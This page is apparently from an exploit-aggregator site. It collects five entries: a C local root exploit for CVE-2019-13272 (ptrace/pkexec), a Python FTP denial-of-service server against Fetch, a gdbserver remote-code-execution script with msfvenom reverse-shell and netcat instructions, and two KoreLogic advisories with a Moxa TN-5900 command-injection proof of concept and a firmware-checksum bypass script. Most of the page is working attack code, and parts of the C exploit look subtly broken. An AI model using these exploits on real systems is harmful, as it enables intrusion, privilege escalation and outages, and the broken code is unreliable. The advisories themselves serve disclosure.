Latest exploits :: CodePwn

<pre><code># Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2) # Date: 11/22/21 # Exploit Author: Ujas Dhami # Version: 4.19 - 5.2.1 # Platform: Linux # Tested on: # ~ Ubuntu 19.04 kernel 5.0.0-15-generic # ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64 # ~ Kali Linux kernel 4.19.0-kali5-amd64 # CVE: CVE-2019-13272 // .... // Original discovery and exploit author: Jann Horn // https://bugs.chromium.org/p/project-zero/issues/detail?id=1903 // Modified exploit code of: BColes // https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272 // .... // ~ Uses the PolKit_Exec frontend. // ~ PolKit_Action is branched. // ~ Search is optimized. // ~ Trunks attain search priority upon execution. // .... // ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme // ujas@kali:~$ ./exploit_traceme // Welcome to your Arsenal! // accessing variables... // execution has reached EOP. // familiar trunks are been searched ... // trunk helper found: /usr/sbin/mate-power-backlight-helper // helper initiated: /usr/sbin/mate-power-backlight-helper // SUID process is being initiated (/usr/bin/pkexec) ... // midpid is being traced... // midpid attached. // root@kali:/home/ujas# // .... #include <ctype.h> #include <assert.h> #include <conio.h> #include <stdio.h> #include <sys/syscall.h> #include <sys/stat.h> #include <fcntl.h> #include <sched.h> #include <stddef.h> #include <sys/user.h> #include <linux/elf.h> #include <stdarg.h> #include <pwd.h> #include <sys/prctl.h> #include <sys/wait.h> #include <sys/ptrace.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <signal.h> #define _GNU_SOURCE #define DEBUG #ifdef DEBUG #define dprintf printf #endif #define max(a,b) ((a)>(b) ? (a) : (b)) #define eff(expr) ({ \ typeof(expr) __res = (expr); \ if (__res == -1) { \ dprintf("[-] Error: %s\n", #expr); \ return 0; \ } \ __res; \ }) struct stat st; const char *trunk[1024]; const char *trunks_rec[] = { "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper", "/usr/sbin/mate-power-backlight-helper", "/usr/lib/gnome-settings-daemon/gsd-backlight-helper", "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper", "/usr/lib/unity-settings-daemon/usd-backlight-helper", "/usr/bin/xfpm-power-backlight-helper", "/usr/bin/lxqt-backlight_backend", "/usr/lib/gsd-backlight-helper", "/usr/lib/gsd-wacom-led-helper", "/usr/lib/gsd-wacom-oled-helper", "/usr/libexec/gsd-wacom-led-helper", "/usr/libexec/gsd-wacom-oled-helper", "/usr/libexec/gsd-backlight-helper", }; static int trace_align[2]; static const char *path_exec = "/usr/bin/pkexec"; static const char *path_action = "/usr/bin/pkaction"; static int fd = -1; static int pipe_stat; static const char *term_sh = "/bin/bash"; static int mid_succ = 1; static const char *path_doublealign; static char *tdisp(char *fmt, ...) { static char overlayfs[10000]; va_list ap; va_start(ap, fmt); vsprintf(overlayfs, fmt, ap); va_end(ap); return overlayfs; } static int middle_main(void *overlayfs) { prctl(PR_SET_PDEATHSIG, SIGKILL); pid_t middle = getpid(); fd = eff(open("/proc/_fd/exe", O_RDONLY)); pid_t child = eff(fork()); if (child == 0) { prctl(PR_SET_PDEATHSIG, SIGKILL); eff(dup2(fd, 42)); int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY)); char *threadv = tdisp("\nUid:\t%d\t0\t", getuid()); eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL)); execl(path_exec, basename(path_exec), NULL); while (1) { char overlayfs[1000]; ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0)); overlayfs[buflen] = '\0'; if (strstr(overlayfs, threadv)) break; } dprintf("SUID execution failed."); exit(EXIT_FAILURE); } eff(dup2(fd, 0)); eff(dup2(trace_align[1], 1)); struct passwd *pw = getpwuid(getuid()); if (pw == NULL) { dprintf("err: username invalid/failed to fetch username"); exit(EXIT_FAILURE); } mid_succ = 1; execl(path_exec, basename(path_exec), "--user", pw->pw_name, path_doublealign, "--help", NULL); mid_succ = 0; dprintf("err: pkexec execution failed."); exit(EXIT_FAILURE); } static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) { struct user_regs_struct regs; struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) }; eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL)); eff(waitpid(pid, &pipe_stat, 0)); eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev)); unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL; struct injected_page { unsigned long inj_arse[2]; unsigned long environment[1]; char arg0[8]; char path[1]; } ipage = { .inj_arse = { inject_surface + offsetof(struct injected_page, arg0) } }; strcpy(ipage.arg0, arg0); for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) { unsigned long pro_d = ((unsigned long *)&ipage)[i]; eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long), (void*)pro_d)); } eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev)); eff(ptrace(PTRACE_DETACH, pid, 0, NULL)); eff(waitpid(pid, &pipe_stat, 0)); regs.orig_rax = __NR_execveat; regs.rdi = exec_fd; regs.rsi = inject_surface + offsetof(struct injected_page, path); regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse); regs.r10 = inject_surface + offsetof(struct injected_page, environment); regs.r8 = AT_EMPTY_PATH; } static int stag_2(void) { pid_t child = eff(waitpid(-1, &pipe_stat, 0)); timeexecbuffer(child, 42, "stage3"); return 0; } static int sh_spawn(void) { eff(setresgid(0, 0, 0)); eff(setresuid(0, 0, 0)); execlp(term_sh, basename(term_sh), NULL); dprintf("err: Shell spawn unsuccessful.", term_sh); exit(EXIT_FAILURE); } static int check_env(void) { const char* xdg_session = getenv("XDG_SESSION_ID"); dprintf("accessing variables...\n"); if (stat(path_action, &st) != 0) { dprintf("err: pkaction not found at %s.", path_action); exit(EXIT_FAILURE); } if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) { dprintf("warn: PolKit agent not found.\n"); return 1; } if (stat("/usr/sbin/getsebool", &st) == 0) { if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) { dprintf("warn: [deny_ptrace] is enabled.\n"); return 1; } } if (xdg_session == NULL) { dprintf("warn: $XDG_SESSION_ID is not set.\n"); return 1; } if (stat(path_exec, &st) != 0) { dprintf("err: pkexec not found at %s.", path_exec); exit(EXIT_FAILURE); } dprintf("execution has reached EOP.\n"); return 0; } int trunkh() { char cmd[1024]; snprintf(cmd, sizeof(cmd), "%s --verbose", path_action); FILE *fp; fp = popen(cmd, "r"); if (fp == NULL) { dprintf("err: Failed to run %s.\n", cmd); exit(EXIT_FAILURE); } char line[1024]; char buffer[2048]; int helper_index = 0; int useful_action = 0; static const char *threadv = "org.freedesktop.policykit.exec.path -> "; int needle_length = strlen(threadv); while (fgets(line, sizeof(line)-1, fp) != NULL) { if (strstr(line, "implicit active:")) { if (strstr(line, "yes")) { useful_action = 1; } continue; } if (useful_action == 0) continue; useful_action = 0; int length = strlen(line); char* found = memmem(&line[0], length, threadv, needle_length); if (found == NULL) continue; memset(buffer, 0, sizeof(buffer)); for (int i = 0; found[needle_length + i] != '\n'; i++) { if (i >= sizeof(buffer)-1) continue; buffer[i] = found[needle_length + i]; } if (stat(&buffer[0], &st) != 0) continue; if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 || strstr(&buffer[0], "/cpugovctl") != 0 || strstr(&buffer[0], "/package-system-locked") != 0 || strstr(&buffer[0], "/cddistupgrader") != 0) { dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]); continue; } trunk[helper_index] = strndup(&buffer[0], strlen(buffer)); helper_index++; if (helper_index >= sizeof(trunk)/sizeof(trunk[0])) break; } pclose(fp); return 0; } int root_ptraceme() { dprintf("helper initiated: %s\n", path_doublealign); eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT)); eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000)); char overlayfs = 0; eff(write(trace_align[1], &overlayfs, 1)); dprintf("SUID process is being initiated(%s) ...\n", path_exec); static char stackv[1024*1024]; pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv), CLONE_VM|CLONE_VFORK|SIGCHLD, NULL)); if (!mid_succ) return 1; while (1) { int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY); char overlayfs[16]; int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1)); overlayfs[buflen] = '\0'; *strchrnul(overlayfs, '\n') = '\0'; if (strncmp(overlayfs, basename(path_doublealign), 15) == 0) break; usleep(100000); } dprintf("midpid is being traced...\n"); eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL)); eff(waitpid(midpid, &pipe_stat, 0)); dprintf("midpid attached.\n"); timeexecbuffer(midpid, 0, "stage2"); exit(EXIT_SUCCESS); } int main(int argc, char **inj_arse) { if (strcmp(inj_arse[0], "stage2") == 0) return stag_2(); if (strcmp(inj_arse[0], "stage3") == 0) return sh_spawn(); dprintf("Welcome to your Arsenal!\n"); check_env(); if (argc > 1 && strcmp(inj_arse[1], "check") == 0) { exit(0); } dprintf("efficient trunk is being searched...\n"); trunkh(); for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) { if (trunk[i] == NULL) break; if (stat(trunk[i], &st) == 0) { path_doublealign = trunk[i]; root_ptraceme(); } } dprintf("familiar trunks are been searched ...\n"); for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) { if (stat(trunks_rec[i], &st) == 0) { path_doublealign = trunks_rec[i]; dprintf("trunk helper found: %s\n", path_doublealign); root_ptraceme(); } } return 0; } </code></pre>

<pre><code>#!/usr/bin/env python # # # Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service) # # # Vendor: Fetch Softworks # Product web page: https://www.fetchsoftworks.com # Affected version: 5.8.2 (5K1354) # # Summary: Fetch is a reliable, full-featured file transfer client for the # Apple Macintosh whose user interface emphasizes simplicity and ease of use. # Fetch supports FTP and SFTP, the most popular file transfer protocols on # the Internet for compatibility with thousands of Internet service providers, # web hosting companies, publishers, pre-press companies, and more. # # Desc: The application is prone to a DoS after receiving a long server response # (more than 2K bytes) leading to 100% CPU consumption. # # -------------------------------------------------------------------------------- # ~/Desktop> ps ucp 3498 # USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND # lqwrm 3498 100.0 0.5 60081236 54488 ?? R 5:44PM 4:28.97 Fetch-5K1354-266470421 # ~/Desktop> # -------------------------------------------------------------------------------- # # Tested on: macOS Monterey 12.2 # macOS Big Sur 11.6.2 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5696 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php # # # 27.01.2022 # import socket host = '0.0.0.0' port = 21 s = socket.socket() s.bind((host, port)) s.listen(2) print('Ascolto su', host, 'porta', port, '...') consumptor = '220\x20' consumptor += 'ftp.zeroscience.mk' consumptor += '\x00' * 0x101E consumptor += '\x0D\x0A' while True: try: c, a = s.accept() print('Connessione da', a) print('CPU 100%, Memory++') c.send(bytes(consumptor, 'UTF-8')) c.send(b'Thricer OK, p\'taah\x0A\x0D') print(c.recv(17)) except: break </code></pre>

<pre><code>KL-001-2022-002: Moxa TN-5900 Post Authentication Command Injection Vulnerability Title: Moxa TN-5900 Post Authentication Command Injection Vulnerability Advisory ID: KL-001-2022-002 Publication Date: 2022.01.28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2022-002.txt 1. Vulnerability Details Affected Vendor: Moxa Affected Product: TN-5900 Affected Version: v3.1 and prior Platform: Moxa Linux CWE Classification: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') CVE ID: CVE-2021-46560 2. Vulnerability Description A user who has authenticated to the management web application is able to leverage a command injection vulnerability in the p12 processing code of the certificate management function web_CERMGMTUpload. 3. Technical Description Following authentication, the webs_CERMGMTUpload API method becomes accessible. This method takes a multi-part HTTP POST request containing four parameters. The cer_pw parameter does not properly neutralize special elements used in operating system commands and therefore it is possible to include encapsulated commands to be executed. In the request below, the cer_pw parameter has been written such that when executed by the operating system a zero byte file will appear in the /tmp directory. See the Proof of Concept section. The relevant pseudo-c for this API method is included below. The websGetVar function is used to retrieve the cer_pw parameter and copies the value into the pass variable. The opcode (mgmtmode) is then compared to the number 2 and when true will prepare a command to be passed to system using the sprintf function. When preparing this command, the pass variable (cer_pw) is included without prior first sanitizing the user input. void web_CERMGMTUpload(longlong *param_1,undefined8 param_2,undefined8 param_3) { ... __nptr = websGetVar(param_1,"mgmtmode",&DAT_120064f68); opcode = atoi(__nptr); __s = websGetVar(param_1,"cer_file",&DAT_120063dd0); local_338 = websGetVar(param_1,"cer_name",&DAT_120063dd0); if ((*local_338 == '\0') || (lVar1 = Ssys_CheckString(local_338), -1 < lVar1)) { sVar2 = strlen(__s); if (CONCAT44(extraout_v0_hi,sVar2) < 0x41) { ... sVar4 = strlen(local_338); if (CONCAT44(extraout_v0_hi_00,sVar4) < 0x41) { ... if (opcode == 2) { memset(pass,0,0x41); __s = websGetVar(param_1,"cer_pw",&DAT_120063dd0); strncpy(pass,__s,0x20); ... } ... __fd = open(inFile,0x102); if (__fd < 0) { ... } else { sVar3 = write(__fd,param_1[0x38],*(param_1 + 0x39)); ... else { if (opcode == 2) { outFile = FUN_120038e28(&local_159); snprintf(cmd,0x100, "openssl pkcs12 -in \"%s\" -out %s -passout pass:%s -password pass:%s",inFile ,outFile,pass,pass); system(cmd); ... } ... } Using a debugger we can see the command as it was programmatically created using our malicious input. This command is passed to the system function. (gdb) x/25s $a0 0xfffbddb284: "openssl pkcs12 -in \"/mnt/log1/p12_file/test.p12\" -out /mnt/ramdisk/p12_tmpfile.pem -passout pass:`touch /tmp/korelogic` -password pass:`touch /tmp/korelogic`" The file has been created. # ls -la /tmp/korelogic -rwxr-xr-x 1 root root 8072 Sep 23 20:30 korelogic It should be noted that the cer_name is exploitable as well. 4. Mitigation and Remediation Recommendation The vendor has released a patch which remediates the described vulnerability. Release notes are available at: https://www.moxa.com/en/support/product-support/security-advisory/tn-5900-secure-routers-vulnerabilities 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) and Josh Hardin of KoreLogic, Inc. 6. Disclosure Timeline 2021.02.05 - KoreLogic submits vulnerability details to Moxa. 2021.02.08 - Moxa acknowledges receipt and the intention to investigate. 2021.03.02 - Moxa notifies KoreLogic that a patch for this vulnerability is expected to be available in June 2021. 2021.04.16 - 45 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.06.07 - KoreLogic requests update on the status of the proposed TN-5900 patch. 2021.06.15 - Moxa informs KoreLogic that the patch is expected to be released in mid-July 2021. 2021.06.23 - 90 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.07.25 - Moxa informs KoreLogic that the patch is expected to be released in mid-August 2021. 2021.09.22 - 150 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.12.21 - 210 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.12.27 - Moxa notified KoreLogic that the patch is complete and ready for release.. 2021.12.28 - Moxa public acknowledgement. 2022.01.25 - KoreLogic requests CVE from Mitre. 2022.01.28 - KoreLogic public disclosure. 7. Proof of Concept POST /goform/web_CERMGMTUpload HTTP/1.1 Host: [redacted]:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate ... Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266 Content-Length: 605 -----------------------------9051914041544843365972754266 Content-Disposition: form-data; name="mgmtmode" 2 -----------------------------9051914041544843365972754266 Content-Disposition: form-data; name="cer_file"; Content-Type: text/plain korelogic -----------------------------9051914041544843365972754266 Content-Disposition: form-data; name="cer_name"; Content-Type: text/plain test.p12 -----------------------------9051914041544843365972754266 Content-Disposition: form-data; name="cer_pw"; `touch /tmp/korelogic` -----------------------------9051914041544843365972754266-- HTTP/1.1 200 OK Server: GoAhead-Webs Pragma: no-cache Cache-control: no-cache Content-Type: text/html The contents of this advisory are copyright(c) 2022 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt </code></pre>

<pre><code># Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE) # Date: 2021-11-21 # Exploit Author: Roberto Gesteira Miñarro (7Rocky) # Vendor Homepage: https://www.gnu.org/software/gdb/ # Software Link: https://www.gnu.org/software/gdb/download/ # Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2 # Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries) #!/usr/bin/env python3 import binascii import socket import struct import sys help = f''' Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode> Example: - Victim's gdbserver -> 10.10.10.200:1337 - Attacker's listener -> 10.10.10.100:4444 1. Generate shellcode with msfvenom: $ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin 2. Listen with Netcat: $ nc -nlvp 4444 3. Run the exploit: $ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin ''' def checksum(s: str) -> str: res = sum(map(ord, s)) % 256 return f'{res:2x}' def ack(sock): sock.send(b'+') def send(sock, s: str) -> str: sock.send(f'${s}#{checksum(s)}'.encode()) res = sock.recv(1024) ack(sock) return res.decode() def exploit(sock, payload: str): send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;') send(sock, '!') try: res = send(sock, 'vCont;s') data = res.split(';')[2] arch, pc = data.split(':') except Exception: print('[!] ERROR: Unexpected response. Try again later') exit(1) if arch == '10': print('[+] Found x64 arch') pc = binascii.unhexlify(pc[:pc.index('0*')]) pc += b'\0' * (8 - len(pc)) addr = hex(struct.unpack('<Q', pc)[0])[2:] addr = '0' * (16 - len(addr)) + addr elif arch == '08': print('[+] Found x86 arch') pc = binascii.unhexlify(pc) pc += b'\0' * (4 - len(pc)) addr = hex(struct.unpack('<I', pc)[0])[2:] addr = '0' * (8 - len(addr)) + addr hex_length = hex(len(payload))[2:] print('[+] Sending payload') send(sock, f'M{addr},{hex_length}:{payload}') send(sock, 'vCont;c') def main(): if len(sys.argv) < 3: print(help) exit(1) ip, port = sys.argv[1].split(':') file = sys.argv[2] try: with open(file, 'rb') as f: payload = f.read().hex() except FileNotFoundError: print(f'[!] ERROR: File {file} not found') exit(1) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((ip, int(port))) print('[+] Connected to target. Preparing exploit') exploit(sock, payload) print('[*] Pwned!! Check your listener') if __name__ == '__main__': main() </code></pre>

<pre><code>KL-001-2022-001: Moxa TN-5900 Firmware Upgrade Checksum Validation Vulnerability Title: Moxa TN-5900 Firmware Upgrade Checksum Validation Vulnerability Advisory ID: KL-001-2022-001 Publication Date: 2022.01.28 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2022-001.txt 1. Vulnerability Details Affected Vendor: Moxa Affected Product: TN-5900 Affected Version: v3.1 and prior Platform: Moxa Linux CWE Classification: CWE-354 Improper Validation of Integrity Check Value CVE ID: CVE-2021-46559 2. Vulnerability Description Moxa TN-5900 v3.1.0 and prior uses an insecure method to validate firmware updates. A malicious user with access to the management interface can upload abritrary code in a crafted firmware image simply by replacing a CRC value in the image header. 3. Technical Description Analysis on this vulnerability began when KoreLogic noticed that the Ssgl2_update_session_now function is immediately called when the URL /goform/web_fwUpload is given to the management application. The Ssgl2_update_session_now function will enable a session after authentication through the user interface. undefined4 websSecurityHandler(longlong *param_1) { ... ... if (requestPtr[0x20] != 0) { ... ... field_1 = strncmp(in_t0,"/init.asp",9); if (CONCAT44(extraout_v0_hi_07,field_1) != 0) { field_2 = strncmp(in_t0,"/goform/web_fwUpload",0x14); if (CONCAT44(extraout_v0_hi_08,field_2) == 0) { Ssgl2_update_session_now(local_490); } lVar3 = Ssgl2_webmultisession_session_verify(local_490,auStack104); ... } } ... ... } Reviewing the web_fwUpload function showed the code is used to update the operating firmware of the affected device. Before the firmware is accepted, it must pass a check. This check is provided through the Ssys_firmwareCheck function. void web_fwUpload(longlong *param_1,longlong *param_2) { ... if (lVar1 == -1) { FUN_1200222c0(param_1,"../upgrade.asp","Firmware Upgrade Fail! Restart the device."); ... } else { printf("%s() buffer upload datalen = %d\n","web_fwUpload",*(param_1 + 0x39)); ... ... } else { puts("Ssys_firmwareCheck"); local_118 = Ssys_firmwareCheck(lVar1,4,*(param_1 + 0x39)); if (-1 < local_118) { local_118 = Ssys_writeProgram(lVar1); } if (local_118 < 0) { printf("%s() %d firmware check fail ret = %d\n","web_fwUpload",0x7c0,local_118); ... ... } ... } The Ssys_firmwareCheck function checks that the kernel and file system have an expected length and that the provided image passes a checksum algorithm. undefined8 Ssys_firmwareCheck(ulonglong param_1,longlong param_2,ulonglong param_3,ulonglong param_4) { ... if (param_2 == local_44._4_4_) { ... if (local_4c._0_4_ == 0x400000) { if ((uVar4 < 0x1800001) && ((uVar4 & 3) == 0)) { ... file_check_sum(param_1 + 0x20,local_4c._4_4_ + 0x400000,&local_50); uVar3 = 0; if (local_50 != local_3c._0_4_) { FUN_0010d230("[Error] %s L%d : Firmware checksum error (0x%x), should be 0x%x \r\n","Ssys_firmwareCheck",0x484,local_50,local_3c._0_4_,extraout_t1_00,extraout_t2_00,extraout_t3_00); uVar3 = 0xfffffffffffffffc; } } else { FUN_0010d230("[Error] %s L%d : Rootfs length error (%d), max to %d bytes \r\n","Ssys_firmwareCheck",0x47a,uVar4,0x1800000,extraout_t1,extraout_t2,extraout_t3); uVar3 = 0xfffffffffffffffd; } } else { FUN_0010d230("[Error] %s L%d : Kernel length error (%d), should be %d bytes \r\n","common.c","Ssys_firmwareCheck",0x474,local_4c._0_4_,0x400000,extraout_t2,extraout_t3); uVar3 = 0xfffffffffffffffe; } } else { FUN_0010d230("[Error] %s L%d : Firmware file logo mismatch (0x0x), should be 0x%x \r\n","Ssys_firmwareCheck",0x46c,local_44._4_4_,param_2,extraout_t1,extraout_t2,extraout_t3); uVar3 = 0xffffffffffffffff; } ... } The checksum is simple and implemented using the following algorithm: #!/usr/bin/env python3 import sys from functools import partial from binascii import hexlify with open(sys.argv[1],"rb") as f: f.seek(0x20) checksum = int(0) for dword in iter(partial(f.read,4),b''): checksum += int(hexlify(dword),16) print (hex(checksum)[-8:]) A breakpoint was set on the file_check_sum function using GDB and the valid ROM provided by Moxa was processed. The result of the checksum process was retrieved. Breakpoint 14, 0x000000fff6fac3a4 in _init () from target:/tmp/moxa/usr/lib64/libsyscommon.so (gdb) x/1x 0xfffbf4ce30 0xfffbf4ce30: 0x2f43167a The bytes 0x2f43167a were found in the ROM image itself inside of a header containing 0x20 bytes. $ hexdump -C moxa-tn-5900-series-firmware-v3.1.rom 00000000 00 40 00 00 01 45 b0 00 00 00 00 20 00 00 00 04 |.@...E..... ....| 00000010 2f 43 16 7a 03 01 00 00 14 04 07 11 00 00 00 00 |/C.z............| The following script was constructed to disassemble and rebuild a firmware image using the expected format. The script will create a file /korelogic on the filesystem. The file will be zero bytes. #!/bin/sh IF=$1 OF=$2 dd bs=1 if=$IF of=$IF.header_1 count=$((0x10)) dd bs=1 if=$IF of=$IF.checksum skip=$((0x10)) count=4 dd bs=1 if=$IF of=$IF.header_2 skip=$((0x14)) count=$((0x20-0x14)) dd bs=1 if=$IF of=$IF.kernel skip=$((0x20)) count=$((0x1d9669-0x20)) dd bs=1 if=$IF of=$IF.splitter skip=$((0x1d9669)) count=$((0x400020-0x1d9669)) dd bs=1 if=$IF of=$IF.cramfs skip=$((0x400020)) cramfsswap $IF.cramfs $IF.cramfs.swap sudo cramfsck -x fs $IF.cramfs.swap touch fs/korelogic mkcramfs fs/ $IF.cramfs.modified cat $IF.header_1 $IF.checksum $IF.header_2 $IF.kernel $IF.splitter $IF.cramfs.modified > $OF ./checksum.py $OF | xxd -r -p > check_value dd bs=1 conv=notrunc if=check_value of=$OF seek=$((0x10)) count=4 Here is the script running. $ sudo ./make_moxa_image.sh moxa-tn-5900-series-firmware-v3.1.rom hacked.rom 16+0 records in 16+0 records out 16 bytes copied, 9.967e-05 s, 161 kB/s 4+0 records in 4+0 records out 4 bytes copied, 7.4433e-05 s, 53.7 kB/s 12+0 records in 12+0 records out 12 bytes copied, 0.000118918 s, 101 kB/s 1939017+0 records in 1939017+0 records out 1939017 bytes (1.9 MB, 1.8 MiB) copied, 3.76396 s, 515 kB/s 2255287+0 records in 2255287+0 records out 2255287 bytes (2.3 MB, 2.2 MiB) copied, 4.32499 s, 521 kB/s 21344256+0 records in 21344256+0 records out 21344256 bytes (21 MB, 20 MiB) copied, 40.8949 s, 522 kB/s Filesystem is big endian, will be converted to little endian. Filesystem contains 3313 files. CRC: 0x9b7eefd0 4+0 records in 4+0 records out 4 bytes copied, 7.4433e-05 s, 53.7 kB/s The hacked.rom image is then processed and the same breakpoint is hit. The new checksum should be 0x0987aafc. The new checksum is patched into the hacked.rom image already from the above script. $ hexdump -C hacked.rom 00000000 00 40 00 00 01 45 b0 00 00 00 00 20 00 00 00 04 |.@...E..... ....| 00000010 09 87 aa fc 03 01 00 00 14 04 07 11 00 00 00 00 |/C.z............| GDB output confirms that the checksum is the same result: Breakpoint 2, 0x000000fff72853a4 in _init () from target:/tmp/moxa/usr/lib64/libsyscommon.so (gdb) x/1x 0xfffbad34d0 0xfffbad34d0: 0x0987aafc When processing the hacked.rom image, we receive a new error. Firmware check failed, error occurs when write kernel to flash. Restart the device. Comparing the indicated error against the pseudo-c indicates we have passed the firmware validation checks. This was confirmed using GDB as well. void web_fwUpload(longlong *param_1,longlong *param_2) { ... if (lVar1 == -1) { ... } else { ... else { puts("Ssys_firmwareCheck"); local_118 = Ssys_firmwareCheck(lVar1,4,*(param_1 + 0x39)); if (-1 < local_118) { local_118 = Ssys_writeProgram(lVar1); } ... } The error indicating a write exception is expected as we were not operating on a Moxa device but were instead emulating the Moxa firmware on a MIPS development board. 4. Mitigation and Remediation Recommendation The vendor has released a patch which remediates the described vulnerability. Release notes are available at: https://www.moxa.com/en/support/product-support/security-advisory/tn-5900-secure-routers-vulnerabilities 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) and Josh Hardin of KoreLogic, Inc. 6. Disclosure Timeline 2021.02.05 - KoreLogic submits vulnerability details to Moxa. 2021.02.08 - Moxa acknowledges receipt and the intention to investigate. 2021.03.02 - Moxa notifies KoreLogic that a patch for this vulnerability is expected to be available in June 2021. 2021.04.16 - 45 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.06.07 - KoreLogic requests update on the status of the proposed TN-5900 patch. 2021.06.15 - Moxa informs KoreLogic that the patch is expected to be released in mid-July 2021. 2021.06.23 - 90 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.07.25 - Moxa informs KoreLogic that the patch is expected to be released in mid-August 2021. 2021.09.22 - 150 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.12.21 - 210 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2021.12.27 - Moxa notified KoreLogic that the patch is complete and ready for release.. 2021.12.28 - Moxa public acknowledgement. 2022.01.25 - KoreLogic requests CVE from Mitre. 2022.01.28 - KoreLogic public disclosure. 7. Proof of Concept POST /goform/web_fwUpload HTTP/1.1 Host: 192.168.10.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------11395841764774651092787307532 Content-Length: <HTTP REQUEST SIZE> Connection: close Upgrade-Insecure-Requests: 1 -----------------------------11395841764774651092787307532 Content-Disposition: form-data; name="binary"; filename="hacked.rom" Content-Type: text/plain <HACKED.ROM FIRMWARE IMAGE> -----------------------------11395841764774651092787307532 Content-Disposition: form-data; name="submit" submit -----------------------------11395841764774651092787307532-- HTTP/1.1 200 OK Server: GoAhead-Webs Pragma: no-cache Cache-control: no-cache Content-Type: text/html Transfer-Encoding: chunked <!DOCTYPE html> <html> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <head> <title></title> </head> <body bgcolor="#E8FFF7" text="#000000" topmargin="10" leftmargin="12" > Firmware check failed, error occurs when write kernel to flash. Restart the device. </body> </html> The contents of this advisory are copyright(c) 2022 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt </code></pre>